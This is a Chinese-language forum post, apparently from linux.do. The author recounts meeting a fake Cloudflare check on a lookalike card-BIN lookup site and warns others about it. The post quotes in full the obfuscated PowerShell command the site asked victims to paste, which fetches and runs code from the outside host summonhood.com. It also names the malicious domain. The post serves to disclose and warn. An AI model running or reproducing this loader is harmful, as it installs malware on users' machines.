起因是我想查询一下我买的虚拟卡头,然后我去必应搜索“卡bin查询”,然后看到
这个网址,点击进去,看到cf点击盾,没想这么多继续切换到浏览器其他标签页刷l站,返回去一看,咦,又要验证cf?我这时也没想这么多,以为网站卡了,知道我点击cf的框以后,网站要求我点击win键的同时鼠标右键启动windows powershell,然后ctrl+v粘贴然后回车,这时候我感觉不太对劲了,去ds分析了一下这个代码,一看,好家伙,是 高度混淆的恶意下载器,然后我在刷新恶意网站就没了,看看有没有大佬有兴趣玩一下。
正规网站网站 https://bincheck.io
恶意劫持网站(现在打不开了) https://verify-bincheck.net/?vuid=mosqgpa8-bno28awnj5
恶意劫持网站要求执行的命令(不要去执行!!!)
powershell.exe -wiN MIniMIZE $ClDt=12;$sTm='Name';$hgAV=32;$hftR=((Get-Module -Lis 'Mi*t.Pow*Shell.Ut*ty'));$hftR=$hftR.ExportedCommands;$hftR=$hftR.Values.$sTm;$igf=.$hftR[$ClDt] summonhood.com;$zBft=$hftR[$hgAV]; .$zBft $igf;$tSgCkJBugTUqjorfxlJjoHfjUNEcAEbHNZbrCiwGQuiPkZWOkxPBWAIqwHCFginuJLrbaJfImxgrYhCkSoZqpOumqwTLpQIMBUGTKwZDsBlKywNBKmvTNyclciSxELemIvFGenDQdLtpzXIKimKbEryipZrjlvhuOALykNnTnRXpLgMuaDfnTKtkWuMCbBjJYjPfnTbBtmdNSMLoGWgcaMyhehRUoanzgDAgohvwJjIPVdsZChQeyOGxDRwfiOwLRicNFyOrSFebBXspAUTbOTGQDbgirVxOpZHbEUDXpKJXQXTDOFYGFjjLYcPVXCAbTLekAncdrxDLmTpoigTJTclYEUHPDCZSHNvTBfyQILChBdfTMFTuOujKKjoUGOZSlsQoodxYiyMMFKHiGgIqKLWtTLB碰到类似情况:定向投毒:bincheck.io 伪装验证码诱导执行 PowerShell 远程加载
4 个帖子 - 3 位参与者
来源: linux.do查看原文